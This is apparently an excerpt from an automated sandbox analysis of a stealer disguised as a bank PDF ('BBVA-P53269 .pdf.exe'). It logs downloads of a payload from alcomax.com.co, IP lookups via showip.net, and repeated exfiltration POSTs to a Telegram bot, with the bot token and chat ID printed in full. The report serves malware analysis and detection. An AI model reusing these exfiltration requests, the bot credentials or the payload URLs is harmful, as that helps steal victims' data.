            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_0045DBF0 InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,11_2_0045DBF0
            Source: global trafficHTTP traffic detected: GET /Rzbiaxwk.wav HTTP/1.1Host: alcomax.com.coConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Rzbiaxwk.wav HTTP/1.1Host: alcomax.com.coConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Project1Host: showip.net
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Project1Host: showip.net
            Source: global trafficDNS traffic detected: DNS query: alcomax.com.co
            Source: global trafficDNS traffic detected: DNS query: showip.net
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 6994Connection: Keep-AliveCache-Control: no-cache
            Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1314628182.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, AllData.exe, 00000009.00000002.1448506731.00000000024B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: InstallUtil.exe, 0000000B.00000002.3748344854.000000000130C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://showip.net/4
            Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000BDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://showip.net/=
            Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000BDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://showip.net/C
            Source: InstallUtil.exe, 0000000B.00000002.3748344854.000000000130C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://showip.net/J
            Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1314628182.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, AllData.exe, 00000009.00000002.1448506731.00000000024B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://alcomax.com.co
            Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1314628182.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, AllData.exe, 00000009.00000002.1448506731.00000000024B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://alcomax.com.co/Rzbiaxwk.wav
            Source: BBVA-P53269 .pdf.exe, AllData.exe.4.drString found in binary or memory: https://alcomax.com.co/Rzbiaxwk.wav1Dnlk3oIZWU60R8dJBQwwXQ==
            Source: InstallUtil.exe, 0000000B.00000002.3750651100.0000000003DA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/
            Source: InstallUtil.exe, 0000000B.00000002.3751602429.0000000004093000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.00000000013DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.0000000001368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/t
            Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1338604473.0000000006840000.00000004.08000000.00040000.00000000.sdmp, BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.00000000040B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
            Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1338604473.0000000006840000.00000004.08000000.00040000.00000000.sdmp, BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.00000000040B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
            Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1338604473.0000000006840000.00000004.08000000.00040000.00000000.sdmp, BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.00000000040B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000CA6000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3750651100.0000000003DA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
            Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1338604473.0000000006840000.00000004.08000000.00040000.00000000.sdmp, BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.00000000040B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
            Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1338604473.0000000006840000.00000004.08000000.00040000.00000000.sdmp, BBVA-P53269 .pdf.exe, 00000004.00000002.1314628182.0000000003165000.00000004.00000800.00020000.00000000.sdmp, BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, AllData.exe, 00000009.00000002.1448506731.00000000024F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
            Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1338604473.0000000006840000.00000004.08000000.00040000.00000000.sdmp, BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.00000000040B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
            Source: unknownNetwork traffic detected: HTTP traffic on port 60443 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60420 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60414 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60381
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60380
            Source: unknownNetwork traffic detected: HTTP traffic on port 60392 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60372 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60411
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60410
            Source: unknownNetwork traffic detected: HTTP traffic on port 60395 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60408 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60452 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60372
            Source: unknownNetwork traffic detected: HTTP traffic on port 60389 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60400 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60419
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60418
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60417
            Source: unknownNetwork traffic detected: HTTP traffic on port 60437 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60416
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60415
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60414
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60413
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60379
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60412
            Source: unknownNetwork traffic detected: HTTP traffic on port 60419 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60392
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60391
            Source: unknownNetwork traffic detected: HTTP traffic on port 60411 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60390
            Source: unknownNetwork traffic detected: HTTP traffic on port 60446 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60389
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60422
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60388
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60421
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60387
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60420
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60386
            Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60385
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60384
            Source: unknownNetwork traffic detected: HTTP traffic on port 60426 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60383
            Source: unknownNetwork traffic detected: HTTP traffic on port 60432 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60382
            Source: unknownNetwork traffic detected: HTTP traffic on port 60405 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60429
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60428
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60427
            Source: unknownNetwork traffic detected: HTTP traffic on port 60386 -> 443
